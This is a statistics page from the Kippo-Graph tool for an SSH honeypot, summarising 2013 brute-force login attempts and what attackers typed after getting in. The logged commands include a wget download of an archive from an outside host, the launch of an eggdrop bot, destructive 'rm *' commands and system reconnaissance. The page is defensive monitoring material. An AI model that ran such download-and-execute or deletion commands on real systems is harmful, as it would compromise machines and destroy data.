Source website: bruteforce.gr/kippo-graph
Overall honeypot activity
Total login attempts: 22343
Distinct source IP addresses: 138
Active time period
Start date (first attack): Tuesday, 09-Apr-2013, 20:22 PM
End date (last attack): Saturday, 11-May-2013, 10:29 AM
Graphical statistics generated from your Kippo honeypot database
Top 10 passwords
This vertical bar chart displays the top 10 passwords that attackers try when attacking the system.
Top 10 usernames
This vertical bar chart displays the top 10 usernames that attackers try when attacking the system.
Top 10 user-pass combos
This vertical bar chart displays the top 10 username and password combinations that attackers try when attacking the system.
This pie chart displays the top 10 username and password combinations that attackers try when attacking the system.
Success ratio
This vertical bar chart displays the overall attack success ratio for the particular honeypot system.
Successes per day/week
This vertical bar chart displays the most successful break-ins per day (Top 20) for the particular honeypot system. The numbers indicate how many times correct credentials were given by attackers.
This line chart displays the daily successes on the honeypot system. Spikes indicate successful entries over a weekly period. Warning: Dates with zero successes are not displayed.
This line chart displays the weekly successes on the honeypot system. Curves indicate successful entries over a weekly period.
Connections per IP
This vertical bar chart displays the top 10 unique IPs ordered by the number of overall connections to the system.
This pie chart displays the top 10 unique IPs ordered by the number of overall connections to the system.
Successful logins from the same IP
This vertical bar chart displays the number of successful logins from the same IP address (Top 20). The numbers indicate how many times the particular source opened a successful session.
Probes per day/week
This horizontal bar chart displays the most probes per day (Top 20) against the honeypot system.
This line chart displays the daily activity on the honeypot system. Spikes indicate hacking attempts. Warning: Dates with zero probes are not displayed.
This line chart displays the weekly activity on the honeypot system. Curves indicate hacking attempts over a weekly period.
Top 10 SSH clients
This vertical bar chart displays the top 10 SSH clients used by attackers during their hacking attempts.
Copyright © 2011, 2012 - All Rights Reserved - Kippo-Graph
Thanks to OS Templates
Input presentation and statistics gathered from the honeypot system
Overall post-compromise activity
Post-compromise human activity
Total number of commands: 122
Distinct number of commands: 72
Downloaded files
Total number of downloads: 1
Distinct number of downloads: 1
Human activity inside the honeypot
The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of inputs to the system.
The following line chart visualizes real human activity per day, by counting the number of inputs to the system for each day of operation. Warning: Dates with zero input are not displayed.
The following line chart visualizes real human activity per week, by counting the number of inputs to the system for each day of operation.
Top 10 input (overall)
The following table displays the top 10 commands (overall) entered by attackers in the honeypot system.

ID   Input         Count
1    ls            20
2    exit          7
3    cd ..         7
4    ls -a         3
5    poweroff -h   3
6    poweroff      3
7    top           3
8    ls -l         3
9    test          2
10   w             2

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.
Top 10 successful input
The following table displays the top 10 successful commands entered by attackers in the honeypot system.

ID   Input (success)   Count
1    ls                20
2    exit              7
3    cd ..             7
4    ls -a             3
5    ls -l             3
6    w                 2
7    mkdir TEST        2
8    rm *              2
9    rmdir *           2
10   logout            2

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.
Top 10 failed input
The following table displays the top 10 failed commands entered by attackers in the honeypot system.

ID   Input (fail)    Count
1    poweroff -h     3
2    poweroff        3
3    top             3
4    help            2
5    sudo rmdir *    2
6    test            1
7    halt -h         1
8    halt -n         1
9    halt            1
10   ?               1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.
passwd commands
The following table displays the latest "passwd" commands entered by attackers in the honeypot system.

ID   Timestamp                          Input
1    Wednesday, 24-Apr-2013, 09:11 AM   tst
2    Wednesday, 24-Apr-2013, 09:11 AM   test

wget commands
The following table displays the latest "wget" commands entered by attackers in the honeypot system.

ID: 1
Input: wget rom.do.am/enou.tgz
File link: http://anonym.to/?http://rom.do.am/enou.tgz
NoVirusThanks: Scan File

Executed scripts
The following table displays the latest executed scripts by attackers in the honeypot system.

ID: 1
Timestamp: Monday, 06-May-2013, 17:06 PM
Input: ./eggdrop-1.6.17 -m bot1.conf

Interesting commands
The following table displays other interesting commands executed by attackers in the honeypot system.

ID   Timestamp                          Input
1    Monday, 06-May-2013, 17:06 PM      cat /proc/cpuinfo
2    Wednesday, 01-May-2013, 12:16 PM   cat /etc/issue
3    Wednesday, 24-Apr-2013, 20:26 PM   ifconfig

Geolocation information gathered from the IP addresses probing the Kippo SSH Honeypot
The following table displays the top 10 IP addresses connected to the system (ordered by volume of connections).
The following zoomable world map marks the geographic locations of the top 10 IPs according to their latitude and longitude values. Click on them to get the full information available from the database.
The following Intensity Map shows the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.
The following pie chart visualizes the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.
Geolocation by geoPlugin